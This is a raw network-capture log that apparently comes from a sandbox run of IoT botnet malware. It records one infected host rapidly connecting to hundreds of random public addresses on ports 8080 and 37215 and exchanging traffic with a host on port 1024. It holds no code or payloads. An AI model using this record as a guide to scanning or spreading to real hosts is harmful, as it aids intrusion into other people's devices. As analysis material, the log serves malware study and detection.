                                                        Feb 14, 2024 09:32:42.801129103 CET407478080192.168.2.1462.57.168.82
                                                        Feb 14, 2024 09:32:42.801129103 CET407478080192.168.2.1494.230.56.96
                                                        Feb 14, 2024 09:32:42.801131964 CET407478080192.168.2.1495.50.193.92
                                                        Feb 14, 2024 09:32:42.801143885 CET407478080192.168.2.1495.86.129.116
                                                        Feb 14, 2024 09:32:42.801143885 CET407478080192.168.2.1462.99.148.253
                                                        Feb 14, 2024 09:32:42.801151037 CET407478080192.168.2.1431.215.9.221
                                                        Feb 14, 2024 09:32:42.801167011 CET407478080192.168.2.1431.138.15.166
                                                        Feb 14, 2024 09:32:42.801177025 CET407478080192.168.2.1462.198.118.76
                                                        Feb 14, 2024 09:32:42.801178932 CET407478080192.168.2.1485.136.238.168
                                                        Feb 14, 2024 09:32:42.801198006 CET407478080192.168.2.1462.213.101.36
                                                        Feb 14, 2024 09:32:42.801211119 CET407478080192.168.2.1494.108.10.212
                                                        Feb 14, 2024 09:32:42.801234961 CET407478080192.168.2.1431.121.117.126
                                                        Feb 14, 2024 09:32:42.801240921 CET407478080192.168.2.1485.2.135.37
                                                        Feb 14, 2024 09:32:42.801250935 CET407478080192.168.2.1494.93.171.213
                                                        Feb 14, 2024 09:32:42.801251888 CET407478080192.168.2.1495.142.200.178
                                                        Feb 14, 2024 09:32:42.801259995 CET407478080192.168.2.1485.105.176.218
                                                        Feb 14, 2024 09:32:42.801259995 CET407478080192.168.2.1431.60.144.23
                                                        Feb 14, 2024 09:32:42.801274061 CET407478080192.168.2.1431.23.243.161
                                                        Feb 14, 2024 09:32:42.801279068 CET407478080192.168.2.1494.211.222.201
                                                        Feb 14, 2024 09:32:42.801280975 CET407478080192.168.2.1495.124.248.34
                                                        Feb 14, 2024 09:32:42.801304102 CET407478080192.168.2.1431.97.114.180
                                                        Feb 14, 2024 09:32:42.801305056 CET407478080192.168.2.1495.197.113.212
                                                        Feb 14, 2024 09:32:42.801307917 CET407478080192.168.2.1494.134.55.146
                                                        Feb 14, 2024 09:32:42.801327944 CET407478080192.168.2.1495.80.51.30
                                                        Feb 14, 2024 09:32:42.801342010 CET407478080192.168.2.1485.116.229.250
                                                        Feb 14, 2024 09:32:42.801342010 CET407478080192.168.2.1485.226.82.168
                                                        Feb 14, 2024 09:32:42.801342010 CET407478080192.168.2.1431.215.121.64
                                                        Feb 14, 2024 09:32:42.801352024 CET407478080192.168.2.1431.243.3.88
                                                        Feb 14, 2024 09:32:42.801364899 CET407478080192.168.2.1494.205.152.120
                                                        Feb 14, 2024 09:32:42.801367044 CET407478080192.168.2.1485.42.189.11
                                                        Feb 14, 2024 09:32:42.801378965 CET407478080192.168.2.1431.251.242.195
                                                        Feb 14, 2024 09:32:42.801381111 CET407478080192.168.2.1494.233.120.23
                                                        Feb 14, 2024 09:32:42.801384926 CET407478080192.168.2.1431.103.56.240
                                                        Feb 14, 2024 09:32:42.801414967 CET407478080192.168.2.1485.8.92.154
                                                        Feb 14, 2024 09:32:42.801414967 CET407478080192.168.2.1495.168.188.111
                                                        Feb 14, 2024 09:32:42.801423073 CET407478080192.168.2.1495.133.215.172
                                                        Feb 14, 2024 09:32:42.801434040 CET407478080192.168.2.1494.75.100.40
                                                        Feb 14, 2024 09:32:42.801449060 CET407478080192.168.2.1495.249.131.106
                                                        Feb 14, 2024 09:32:42.801449060 CET407478080192.168.2.1485.4.49.95
                                                        Feb 14, 2024 09:32:42.801453114 CET407478080192.168.2.1462.241.141.0
                                                        Feb 14, 2024 09:32:42.801453114 CET407478080192.168.2.1431.69.140.58
                                                        Feb 14, 2024 09:32:42.801460028 CET407478080192.168.2.1485.89.230.7
                                                        Feb 14, 2024 09:32:42.801460028 CET407478080192.168.2.1431.34.246.116
                                                        Feb 14, 2024 09:32:42.801474094 CET407478080192.168.2.1495.37.138.251
                                                        Feb 14, 2024 09:32:42.801474094 CET407478080192.168.2.1462.139.247.71
                                                        Feb 14, 2024 09:32:42.801491022 CET407478080192.168.2.1495.129.194.120
                                                        Feb 14, 2024 09:32:42.801500082 CET407478080192.168.2.1495.238.255.225
                                                        Feb 14, 2024 09:32:42.801529884 CET407478080192.168.2.1485.206.252.102
                                                        Feb 14, 2024 09:32:42.801529884 CET407478080192.168.2.1431.242.145.38
                                                        Feb 14, 2024 09:32:42.801547050 CET407478080192.168.2.1462.129.161.109
                                                        Feb 14, 2024 09:32:42.801548958 CET407478080192.168.2.1485.116.114.27
                                                        Feb 14, 2024 09:32:42.801548958 CET407478080192.168.2.1431.12.88.143
                                                        Feb 14, 2024 09:32:42.801558018 CET407478080192.168.2.1494.26.246.29
                                                        Feb 14, 2024 09:32:42.801563025 CET407478080192.168.2.1431.206.130.78
                                                        Feb 14, 2024 09:32:42.801563025 CET407478080192.168.2.1494.207.69.222
                                                        Feb 14, 2024 09:32:42.801573992 CET407478080192.168.2.1431.29.196.159
                                                        Feb 14, 2024 09:32:42.801582098 CET407478080192.168.2.1462.237.80.102
                                                        Feb 14, 2024 09:32:42.801605940 CET407478080192.168.2.1462.41.247.200
                                                        Feb 14, 2024 09:32:42.801609039 CET407478080192.168.2.1485.251.165.71
                                                        Feb 14, 2024 09:32:42.801613092 CET407478080192.168.2.1495.223.71.34
                                                        Feb 14, 2024 09:32:42.801635981 CET407478080192.168.2.1462.229.27.70
                                                        Feb 14, 2024 09:32:42.801637888 CET407478080192.168.2.1495.89.184.99
                                                        Feb 14, 2024 09:32:42.801637888 CET407478080192.168.2.1495.153.62.159
                                                        Feb 14, 2024 09:32:42.801666021 CET407478080192.168.2.1495.219.214.103
                                                        Feb 14, 2024 09:32:42.801666021 CET407478080192.168.2.1431.14.188.233
                                                        Feb 14, 2024 09:32:42.801666021 CET407478080192.168.2.1495.207.216.185
                                                        Feb 14, 2024 09:32:42.801668882 CET407478080192.168.2.1485.223.175.179
                                                        Feb 14, 2024 09:32:42.801670074 CET407478080192.168.2.1431.131.4.203
                                                        Feb 14, 2024 09:32:42.801692963 CET407478080192.168.2.1462.33.40.214
                                                        Feb 14, 2024 09:32:42.801692963 CET407478080192.168.2.1485.129.193.204
                                                        Feb 14, 2024 09:32:42.801696062 CET407478080192.168.2.1494.41.202.249
                                                        Feb 14, 2024 09:32:42.801696062 CET407478080192.168.2.1495.142.227.117
                                                        Feb 14, 2024 09:32:42.801709890 CET407478080192.168.2.1495.184.224.161
                                                        Feb 14, 2024 09:32:42.801709890 CET407478080192.168.2.1462.243.123.55
                                                        Feb 14, 2024 09:32:42.801712036 CET407478080192.168.2.1485.24.87.220
                                                        Feb 14, 2024 09:32:42.801727057 CET407478080192.168.2.1495.83.7.156
                                                        Feb 14, 2024 09:32:42.801732063 CET407478080192.168.2.1462.108.156.160
                                                        Feb 14, 2024 09:32:42.801742077 CET407478080192.168.2.1494.198.240.235
                                                        Feb 14, 2024 09:32:42.801743031 CET407478080192.168.2.1431.126.38.220
                                                        Feb 14, 2024 09:32:42.801764011 CET407478080192.168.2.1485.84.230.192
                                                        Feb 14, 2024 09:32:42.801764965 CET407478080192.168.2.1462.43.47.165
                                                        Feb 14, 2024 09:32:42.801774979 CET407478080192.168.2.1485.177.181.26
                                                        Feb 14, 2024 09:32:42.801789999 CET407478080192.168.2.1462.202.101.1
                                                        Feb 14, 2024 09:32:42.801793098 CET407478080192.168.2.1494.25.64.237
                                                        Feb 14, 2024 09:32:42.801799059 CET407478080192.168.2.1462.50.57.17
                                                        Feb 14, 2024 09:32:42.801805019 CET407478080192.168.2.1485.93.239.238
                                                        Feb 14, 2024 09:32:42.801815033 CET407478080192.168.2.1485.45.13.48
                                                        Feb 14, 2024 09:32:42.801827908 CET407478080192.168.2.1485.11.78.242
                                                        Feb 14, 2024 09:32:42.801841021 CET407478080192.168.2.1494.233.228.76
                                                        Feb 14, 2024 09:32:42.801861048 CET407478080192.168.2.1495.72.183.42
                                                        Feb 14, 2024 09:32:42.801861048 CET407478080192.168.2.1485.213.109.239
                                                        Feb 14, 2024 09:32:42.801872969 CET407478080192.168.2.1495.193.79.23
                                                        Feb 14, 2024 09:32:42.801902056 CET407478080192.168.2.1485.127.154.151
                                                        Feb 14, 2024 09:32:42.801911116 CET407478080192.168.2.1462.120.16.123
                                                        Feb 14, 2024 09:32:42.801911116 CET407478080192.168.2.1495.88.48.183
                                                        Feb 14, 2024 09:32:42.801915884 CET407478080192.168.2.1485.102.140.133
                                                        Feb 14, 2024 09:32:42.801929951 CET407478080192.168.2.1462.240.86.52
                                                        Feb 14, 2024 09:32:42.802014112 CET407478080192.168.2.1431.162.94.11
                                                        Feb 14, 2024 09:32:42.802014112 CET407478080192.168.2.1431.218.11.29
                                                        Feb 14, 2024 09:32:42.802016020 CET407478080192.168.2.1495.148.203.54
                                                        Feb 14, 2024 09:32:42.802036047 CET407478080192.168.2.1431.113.94.217
                                                        Feb 14, 2024 09:32:42.802057028 CET407478080192.168.2.1462.250.186.169
                                                        Feb 14, 2024 09:32:42.802057028 CET407478080192.168.2.1431.51.123.0
                                                        Feb 14, 2024 09:32:42.802063942 CET407478080192.168.2.1431.125.19.130
                                                        Feb 14, 2024 09:32:42.802068949 CET407478080192.168.2.1462.177.48.223
                                                        Feb 14, 2024 09:32:42.802082062 CET407478080192.168.2.1494.129.211.74
                                                        Feb 14, 2024 09:32:42.802088976 CET407478080192.168.2.1494.194.80.68
                                                        Feb 14, 2024 09:32:42.802088976 CET407478080192.168.2.1485.171.16.121
                                                        Feb 14, 2024 09:32:42.802097082 CET407478080192.168.2.1494.154.125.14
                                                        Feb 14, 2024 09:32:42.802107096 CET407478080192.168.2.1485.148.132.233
                                                        Feb 14, 2024 09:32:42.802169085 CET407478080192.168.2.1462.233.172.58
                                                        Feb 14, 2024 09:32:42.802170992 CET407478080192.168.2.1494.137.57.123
                                                        Feb 14, 2024 09:32:42.802192926 CET407478080192.168.2.1431.240.179.78
                                                        Feb 14, 2024 09:32:42.802202940 CET407478080192.168.2.1495.193.202.228
                                                        Feb 14, 2024 09:32:42.802202940 CET407478080192.168.2.1485.73.148.171
                                                        Feb 14, 2024 09:32:42.802206993 CET407478080192.168.2.1462.52.240.157
                                                        Feb 14, 2024 09:32:42.802258015 CET407478080192.168.2.1462.159.240.83
                                                        Feb 14, 2024 09:32:42.802269936 CET407478080192.168.2.1495.254.173.245
                                                        Feb 14, 2024 09:32:42.802269936 CET407478080192.168.2.1431.102.189.45
                                                        Feb 14, 2024 09:32:42.802278042 CET407478080192.168.2.1495.135.22.42
                                                        Feb 14, 2024 09:32:42.802278042 CET407478080192.168.2.1462.148.114.130
                                                        Feb 14, 2024 09:32:42.802284002 CET407478080192.168.2.1431.19.138.243
                                                        Feb 14, 2024 09:32:42.802289009 CET407478080192.168.2.1494.7.173.116
                                                        Feb 14, 2024 09:32:42.802289009 CET407478080192.168.2.1494.148.49.220
                                                        Feb 14, 2024 09:32:42.802306890 CET407478080192.168.2.1462.205.128.62
                                                        Feb 14, 2024 09:32:42.802306890 CET407478080192.168.2.1494.176.43.108
                                                        Feb 14, 2024 09:32:42.802316904 CET407478080192.168.2.1485.177.168.112
                                                        Feb 14, 2024 09:32:42.802366972 CET407478080192.168.2.1431.217.104.51
                                                        Feb 14, 2024 09:32:42.802367926 CET407478080192.168.2.1431.91.231.147
                                                        Feb 14, 2024 09:32:42.802381039 CET407478080192.168.2.1462.115.3.102
                                                        Feb 14, 2024 09:32:42.802402973 CET407478080192.168.2.1431.30.124.199
                                                        Feb 14, 2024 09:32:42.802402973 CET407478080192.168.2.1485.80.29.193
                                                        Feb 14, 2024 09:32:42.802405119 CET407478080192.168.2.1462.22.229.101
                                                        Feb 14, 2024 09:32:42.802406073 CET407478080192.168.2.1431.177.100.248
                                                        Feb 14, 2024 09:32:42.802463055 CET407478080192.168.2.1462.128.245.62
                                                        Feb 14, 2024 09:32:42.802463055 CET407478080192.168.2.1494.240.119.104
                                                        Feb 14, 2024 09:32:42.802479982 CET407478080192.168.2.1495.137.201.117
                                                        Feb 14, 2024 09:32:42.802485943 CET407478080192.168.2.1431.17.227.211
                                                        Feb 14, 2024 09:32:42.802486897 CET407478080192.168.2.1494.88.110.91
                                                        Feb 14, 2024 09:32:42.802496910 CET407478080192.168.2.1485.211.255.30
                                                        Feb 14, 2024 09:32:42.802505970 CET407478080192.168.2.1431.192.226.168
                                                        Feb 14, 2024 09:32:42.802516937 CET407478080192.168.2.1431.150.194.211
                                                        Feb 14, 2024 09:32:42.802560091 CET407478080192.168.2.1462.63.107.90
                                                        Feb 14, 2024 09:32:42.802565098 CET407478080192.168.2.1495.117.36.182
                                                        Feb 14, 2024 09:32:42.802570105 CET407478080192.168.2.1485.11.246.49
                                                        Feb 14, 2024 09:32:42.802580118 CET407478080192.168.2.1431.200.221.126
                                                        Feb 14, 2024 09:32:42.802580118 CET407478080192.168.2.1485.77.60.169
                                                        Feb 14, 2024 09:32:42.802584887 CET407478080192.168.2.1431.232.38.235
                                                        Feb 14, 2024 09:32:42.802594900 CET407478080192.168.2.1431.134.227.74
                                                        Feb 14, 2024 09:32:42.802603006 CET407478080192.168.2.1462.23.31.208
                                                        Feb 14, 2024 09:32:42.802606106 CET407478080192.168.2.1431.73.193.145
                                                        Feb 14, 2024 09:32:42.802619934 CET407478080192.168.2.1462.217.140.194
                                                        Feb 14, 2024 09:32:42.802664995 CET407478080192.168.2.1494.231.254.236
                                                        Feb 14, 2024 09:32:42.802669048 CET407478080192.168.2.1495.59.26.251
                                                        Feb 14, 2024 09:32:42.802675962 CET407478080192.168.2.1431.113.53.31
                                                        Feb 14, 2024 09:32:42.802681923 CET407478080192.168.2.1462.55.134.91
                                                        Feb 14, 2024 09:32:42.802696943 CET407478080192.168.2.1494.122.240.188
                                                        Feb 14, 2024 09:32:42.802699089 CET407478080192.168.2.1462.170.144.86
                                                        Feb 14, 2024 09:32:42.802709103 CET407478080192.168.2.1494.97.8.160
                                                        Feb 14, 2024 09:32:42.802720070 CET407478080192.168.2.1494.57.227.102
                                                        Feb 14, 2024 09:32:42.802752972 CET407478080192.168.2.1494.245.53.177
                                                        Feb 14, 2024 09:32:42.802755117 CET407478080192.168.2.1495.254.206.219
                                                        Feb 14, 2024 09:32:42.802755117 CET407478080192.168.2.1462.26.236.137
                                                        Feb 14, 2024 09:32:42.802757978 CET407478080192.168.2.1485.221.76.21
                                                        Feb 14, 2024 09:32:42.802779913 CET407478080192.168.2.1494.76.234.27
                                                        Feb 14, 2024 09:32:42.802779913 CET407478080192.168.2.1462.177.242.200
                                                        Feb 14, 2024 09:32:42.802786112 CET407478080192.168.2.1431.108.120.218
                                                        Feb 14, 2024 09:32:42.802797079 CET407478080192.168.2.1494.216.47.228
                                                        Feb 14, 2024 09:32:42.802851915 CET407478080192.168.2.1485.128.124.129
                                                        Feb 14, 2024 09:32:42.802855015 CET407478080192.168.2.1495.121.119.191
                                                        Feb 14, 2024 09:32:42.802869081 CET407478080192.168.2.1462.167.95.100
                                                        Feb 14, 2024 09:32:42.802869081 CET407478080192.168.2.1494.207.71.197
                                                        Feb 14, 2024 09:32:42.802884102 CET407478080192.168.2.1494.153.226.91
                                                        Feb 14, 2024 09:32:42.802884102 CET407478080192.168.2.1495.62.228.219
                                                        Feb 14, 2024 09:32:42.802887917 CET407478080192.168.2.1495.178.155.238
                                                        Feb 14, 2024 09:32:42.802891016 CET407478080192.168.2.1494.162.125.101
                                                        Feb 14, 2024 09:32:42.802891016 CET407478080192.168.2.1431.39.228.177
                                                        Feb 14, 2024 09:32:42.802942991 CET407478080192.168.2.1495.101.141.111
                                                        Feb 14, 2024 09:32:42.802952051 CET407478080192.168.2.1431.25.254.116
                                                        Feb 14, 2024 09:32:42.802958012 CET407478080192.168.2.1462.43.210.79
                                                        Feb 14, 2024 09:32:42.802963972 CET407478080192.168.2.1494.69.167.76
                                                        Feb 14, 2024 09:32:42.802994013 CET407478080192.168.2.1494.245.166.172
                                                        Feb 14, 2024 09:32:42.802999020 CET407478080192.168.2.1494.99.169.71
                                                        Feb 14, 2024 09:32:42.802998066 CET407478080192.168.2.1495.19.58.238
                                                        Feb 14, 2024 09:32:42.803046942 CET407478080192.168.2.1494.4.100.200
                                                        Feb 14, 2024 09:32:42.803047895 CET407478080192.168.2.1494.19.16.228
                                                        Feb 14, 2024 09:32:42.803056955 CET407478080192.168.2.1431.153.144.53
                                                        Feb 14, 2024 09:32:42.803073883 CET407478080192.168.2.1431.7.108.48
                                                        Feb 14, 2024 09:32:42.803073883 CET407478080192.168.2.1495.53.101.70
                                                        Feb 14, 2024 09:32:42.803086996 CET407478080192.168.2.1494.236.76.163
                                                        Feb 14, 2024 09:32:42.803090096 CET407478080192.168.2.1495.118.72.235
                                                        Feb 14, 2024 09:32:42.803095102 CET407478080192.168.2.1431.211.47.192
                                                        Feb 14, 2024 09:32:42.803098917 CET407478080192.168.2.1495.239.182.79
                                                        Feb 14, 2024 09:32:42.803101063 CET407478080192.168.2.1431.163.178.134
                                                        Feb 14, 2024 09:32:42.803133011 CET407478080192.168.2.1431.169.21.178
                                                        Feb 14, 2024 09:32:42.803158045 CET407478080192.168.2.1485.55.236.207
                                                        Feb 14, 2024 09:32:42.803164005 CET407478080192.168.2.1462.142.76.4
                                                        Feb 14, 2024 09:32:42.803164005 CET407478080192.168.2.1462.132.51.43
                                                        Feb 14, 2024 09:32:42.803180933 CET407478080192.168.2.1485.27.210.193
                                                        Feb 14, 2024 09:32:42.803184032 CET407478080192.168.2.1494.199.188.84
                                                        Feb 14, 2024 09:32:42.803186893 CET407478080192.168.2.1462.202.250.28
                                                        Feb 14, 2024 09:32:42.803203106 CET407478080192.168.2.1495.155.10.113
                                                        Feb 14, 2024 09:32:42.803241968 CET407478080192.168.2.1485.156.84.50
                                                        Feb 14, 2024 09:32:42.803252935 CET407478080192.168.2.1495.142.183.29
                                                        Feb 14, 2024 09:32:42.803252935 CET407478080192.168.2.1495.56.196.170
                                                        Feb 14, 2024 09:32:42.803252935 CET407478080192.168.2.1494.31.143.132
                                                        Feb 14, 2024 09:32:42.803275108 CET407478080192.168.2.1494.107.182.211
                                                        Feb 14, 2024 09:32:42.803287029 CET407478080192.168.2.1495.8.133.118
                                                        Feb 14, 2024 09:32:42.803287029 CET407478080192.168.2.1462.207.136.167
                                                        Feb 14, 2024 09:32:42.803291082 CET407478080192.168.2.1485.131.248.38
                                                        Feb 14, 2024 09:32:42.803297043 CET407478080192.168.2.1431.197.236.114
                                                        Feb 14, 2024 09:32:42.803361893 CET407478080192.168.2.1431.252.230.14
                                                        Feb 14, 2024 09:32:42.803368092 CET407478080192.168.2.1431.130.125.242
                                                        Feb 14, 2024 09:32:42.803369999 CET407478080192.168.2.1431.118.22.61
                                                        Feb 14, 2024 09:32:42.803370953 CET407478080192.168.2.1431.126.68.206
                                                        Feb 14, 2024 09:32:42.803369999 CET407478080192.168.2.1462.77.232.22
                                                        Feb 14, 2024 09:32:42.803369999 CET407478080192.168.2.1485.191.198.214
                                                        Feb 14, 2024 09:32:42.803426027 CET407478080192.168.2.1431.103.197.81
                                                        Feb 14, 2024 09:32:42.803447962 CET407478080192.168.2.1431.51.226.113
                                                        Feb 14, 2024 09:32:42.803447962 CET407478080192.168.2.1495.173.209.254
                                                        Feb 14, 2024 09:32:42.803447962 CET407478080192.168.2.1495.107.84.71
                                                        Feb 14, 2024 09:32:42.803453922 CET407478080192.168.2.1462.227.167.168
                                                        Feb 14, 2024 09:32:42.803453922 CET407478080192.168.2.1485.205.202.141
                                                        Feb 14, 2024 09:32:42.803455114 CET407478080192.168.2.1462.9.21.168
                                                        Feb 14, 2024 09:32:42.803455114 CET407478080192.168.2.1494.188.111.245
                                                        Feb 14, 2024 09:32:42.803468943 CET407478080192.168.2.1494.102.144.242
                                                        Feb 14, 2024 09:32:42.803478003 CET407478080192.168.2.1494.74.81.21
                                                        Feb 14, 2024 09:32:42.803498030 CET407478080192.168.2.1462.27.149.179
                                                        Feb 14, 2024 09:32:42.803522110 CET407478080192.168.2.1495.46.196.79
                                                        Feb 14, 2024 09:32:42.803523064 CET407478080192.168.2.1462.118.243.8
                                                        Feb 14, 2024 09:32:42.803533077 CET407478080192.168.2.1485.105.213.199
                                                        Feb 14, 2024 09:32:42.803535938 CET407478080192.168.2.1495.2.44.140
                                                        Feb 14, 2024 09:32:42.803539038 CET407478080192.168.2.1495.162.81.145
                                                        Feb 14, 2024 09:32:42.803554058 CET407478080192.168.2.1495.98.194.14
                                                        Feb 14, 2024 09:32:42.803564072 CET407478080192.168.2.1431.35.161.156
                                                        Feb 14, 2024 09:32:42.803586960 CET407478080192.168.2.1495.221.142.225
                                                        Feb 14, 2024 09:32:42.803622007 CET407478080192.168.2.1494.137.111.72
                                                        Feb 14, 2024 09:32:42.803632975 CET407478080192.168.2.1485.104.195.242
                                                        Feb 14, 2024 09:32:42.803656101 CET407478080192.168.2.1494.186.181.125
                                                        Feb 14, 2024 09:32:42.803654909 CET407478080192.168.2.1494.151.72.67
                                                        Feb 14, 2024 09:32:42.803667068 CET407478080192.168.2.1431.191.107.62
                                                        Feb 14, 2024 09:32:42.803667068 CET407478080192.168.2.1495.238.234.198
                                                        Feb 14, 2024 09:32:42.803669930 CET407478080192.168.2.1431.1.120.5
                                                        Feb 14, 2024 09:32:42.803695917 CET407478080192.168.2.1494.245.40.124
                                                        Feb 14, 2024 09:32:42.805258989 CET407478080192.168.2.1431.163.178.154
                                                        Feb 14, 2024 09:32:42.805273056 CET407478080192.168.2.1431.103.148.145
                                                        Feb 14, 2024 09:32:42.805280924 CET407478080192.168.2.1431.136.26.102
                                                        Feb 14, 2024 09:32:42.805285931 CET407478080192.168.2.1462.135.124.140
                                                        Feb 14, 2024 09:32:42.805295944 CET407478080192.168.2.1485.120.20.223
                                                        Feb 14, 2024 09:32:42.805298090 CET407478080192.168.2.1495.144.218.139
                                                        Feb 14, 2024 09:32:42.805301905 CET407478080192.168.2.1485.151.238.234
                                                        Feb 14, 2024 09:32:42.805316925 CET407478080192.168.2.1485.112.15.217
                                                        Feb 14, 2024 09:32:42.805352926 CET407478080192.168.2.1462.120.87.102
                                                        Feb 14, 2024 09:32:42.805352926 CET407478080192.168.2.1485.249.128.123
                                                        Feb 14, 2024 09:32:42.805381060 CET407478080192.168.2.1494.183.84.59
                                                        Feb 14, 2024 09:32:42.805387020 CET407478080192.168.2.1431.83.154.122
                                                        Feb 14, 2024 09:32:42.805399895 CET407478080192.168.2.1485.57.139.126
                                                        Feb 14, 2024 09:32:42.805399895 CET407478080192.168.2.1462.64.9.167
                                                        Feb 14, 2024 09:32:42.805408955 CET407478080192.168.2.1431.31.10.185
                                                        Feb 14, 2024 09:32:42.805424929 CET407478080192.168.2.1431.87.159.78
                                                        Feb 14, 2024 09:32:42.805448055 CET407478080192.168.2.1462.130.48.96
                                                        Feb 14, 2024 09:32:42.805448055 CET407478080192.168.2.1462.176.242.186
                                                        Feb 14, 2024 09:32:42.805469990 CET407478080192.168.2.1494.221.78.180
                                                        Feb 14, 2024 09:32:42.805469990 CET407478080192.168.2.1431.89.62.169
                                                        Feb 14, 2024 09:32:42.805489063 CET407478080192.168.2.1431.143.128.185
                                                        Feb 14, 2024 09:32:42.805500031 CET407478080192.168.2.1485.202.80.172
                                                        Feb 14, 2024 09:32:42.805500984 CET407478080192.168.2.1485.8.37.49
                                                        Feb 14, 2024 09:32:42.805500984 CET407478080192.168.2.1431.15.82.106
                                                        Feb 14, 2024 09:32:42.805501938 CET407478080192.168.2.1431.115.112.66
                                                        Feb 14, 2024 09:32:42.805529118 CET407478080192.168.2.1494.227.110.230
                                                        Feb 14, 2024 09:32:42.805556059 CET407478080192.168.2.1495.49.53.178
                                                        Feb 14, 2024 09:32:42.805641890 CET407478080192.168.2.1462.31.150.37
                                                        Feb 14, 2024 09:32:42.913664103 CET80804074794.241.179.49192.168.2.14
                                                        Feb 14, 2024 09:32:42.925316095 CET233332345.33.4.231192.168.2.14
                                                        Feb 14, 2024 09:32:42.984020948 CET804023588.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:42.984184027 CET4023580192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:42.994841099 CET804023588.218.185.84192.168.2.14
                                                        Feb 14, 2024 09:32:42.995515108 CET804023588.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:42.995604992 CET4023580192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:42.998662949 CET80804074731.136.7.105192.168.2.14
                                                        Feb 14, 2024 09:32:42.998734951 CET407478080192.168.2.1431.136.7.105
                                                        Feb 14, 2024 09:32:43.001430988 CET804023588.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:43.001492023 CET4023580192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:43.003957987 CET80804074762.56.196.244192.168.2.14
                                                        Feb 14, 2024 09:32:43.004363060 CET80804074762.146.10.175192.168.2.14
                                                        Feb 14, 2024 09:32:43.016412020 CET804023588.157.99.22192.168.2.14
                                                        Feb 14, 2024 09:32:43.020006895 CET80804074785.214.134.119192.168.2.14
                                                        Feb 14, 2024 09:32:43.020814896 CET80804074794.227.160.75192.168.2.14
                                                        Feb 14, 2024 09:32:43.021204948 CET102440478141.98.10.72192.168.2.14
                                                        Feb 14, 2024 09:32:43.021447897 CET404781024192.168.2.14141.98.10.72
                                                        Feb 14, 2024 09:32:43.021449089 CET404781024192.168.2.14141.98.10.72
                                                        Feb 14, 2024 09:32:43.027220964 CET80804074785.218.172.12192.168.2.14
                                                        Feb 14, 2024 09:32:43.027292013 CET407478080192.168.2.1485.218.172.12
                                                        Feb 14, 2024 09:32:43.027707100 CET80804074762.117.200.119192.168.2.14
                                                        Feb 14, 2024 09:32:43.028362989 CET80804074794.139.245.66192.168.2.14
                                                        Feb 14, 2024 09:32:43.032588959 CET23233332337.222.53.110192.168.2.14
                                                        Feb 14, 2024 09:32:43.033812046 CET80804074785.236.238.248192.168.2.14
                                                        Feb 14, 2024 09:32:43.035243034 CET80804074795.235.179.132192.168.2.14
                                                        Feb 14, 2024 09:32:43.037123919 CET233332385.93.229.247192.168.2.14
                                                        Feb 14, 2024 09:32:43.043188095 CET80804074795.72.114.15192.168.2.14
                                                        Feb 14, 2024 09:32:43.043260098 CET80804074795.62.97.56192.168.2.14
                                                        Feb 14, 2024 09:32:43.043905973 CET80804074794.19.16.228192.168.2.14
                                                        Feb 14, 2024 09:32:43.044332981 CET80804074731.148.223.244192.168.2.14
                                                        Feb 14, 2024 09:32:43.044590950 CET80804074794.187.112.47192.168.2.14
                                                        Feb 14, 2024 09:32:43.044660091 CET407478080192.168.2.1494.187.112.47
                                                        Feb 14, 2024 09:32:43.045375109 CET80804074762.29.24.249192.168.2.14
                                                        Feb 14, 2024 09:32:43.045423985 CET407478080192.168.2.1462.29.24.249
                                                        Feb 14, 2024 09:32:43.052409887 CET80804074785.239.40.22192.168.2.14
                                                        Feb 14, 2024 09:32:43.053329945 CET80804074795.84.35.113192.168.2.14
                                                        Feb 14, 2024 09:32:43.055424929 CET80804074795.221.142.225192.168.2.14
                                                        Feb 14, 2024 09:32:43.056227922 CET80804074794.123.78.59192.168.2.14
                                                        Feb 14, 2024 09:32:43.056289911 CET407478080192.168.2.1494.123.78.59
                                                        Feb 14, 2024 09:32:43.056669950 CET80804074794.121.18.114192.168.2.14
                                                        Feb 14, 2024 09:32:43.056725025 CET407478080192.168.2.1494.121.18.114
                                                        Feb 14, 2024 09:32:43.064970970 CET80804074762.89.30.228192.168.2.14
                                                        Feb 14, 2024 09:32:43.070571899 CET80804074731.135.100.57192.168.2.14
                                                        Feb 14, 2024 09:32:43.073246002 CET80804074795.9.227.88192.168.2.14
                                                        Feb 14, 2024 09:32:43.075932026 CET233332360.68.85.197192.168.2.14
                                                        Feb 14, 2024 09:32:43.090940952 CET80804074795.215.160.125192.168.2.14
                                                        Feb 14, 2024 09:32:43.091149092 CET407478080192.168.2.1495.215.160.125
                                                        Feb 14, 2024 09:32:43.105097055 CET2333323203.54.150.27192.168.2.14
                                                        Feb 14, 2024 09:32:43.105530024 CET80804074785.8.183.19192.168.2.14
                                                        Feb 14, 2024 09:32:43.114751101 CET80804074731.217.210.246192.168.2.14
                                                        Feb 14, 2024 09:32:43.136003017 CET2333323121.241.139.249192.168.2.14
                                                        Feb 14, 2024 09:32:43.165580988 CET2333323117.57.57.226192.168.2.14
                                                        Feb 14, 2024 09:32:43.168752909 CET3721539979157.230.39.188192.168.2.14
                                                        Feb 14, 2024 09:32:43.242984056 CET102440478141.98.10.72192.168.2.14
                                                        Feb 14, 2024 09:32:43.243262053 CET404781024192.168.2.14141.98.10.72
                                                        Feb 14, 2024 09:32:43.464334011 CET102440478141.98.10.72192.168.2.14
                                                        Feb 14, 2024 09:32:43.789215088 CET3997937215192.168.2.14197.153.158.52
                                                        Feb 14, 2024 09:32:43.789221048 CET3997937215192.168.2.14197.175.79.127
                                                        Feb 14, 2024 09:32:43.789238930 CET3997937215192.168.2.14197.66.141.148
                                                        Feb 14, 2024 09:32:43.789266109 CET3997937215192.168.2.14197.15.167.227
                                                        Feb 14, 2024 09:32:43.789267063 CET3997937215192.168.2.14197.68.120.157
                                                        Feb 14, 2024 09:32:43.789268970 CET3997937215192.168.2.14197.176.139.162
                                                        Feb 14, 2024 09:32:43.789282084 CET3997937215192.168.2.14197.34.59.171
                                                        Feb 14, 2024 09:32:43.789299011 CET3997937215192.168.2.14197.200.178.55
                                                        Feb 14, 2024 09:32:43.789324999 CET3997937215192.168.2.14197.46.17.98
                                                        Feb 14, 2024 09:32:43.789325953 CET3997937215192.168.2.14197.231.145.252
                                                        Feb 14, 2024 09:32:43.789329052 CET3997937215192.168.2.14197.163.38.39
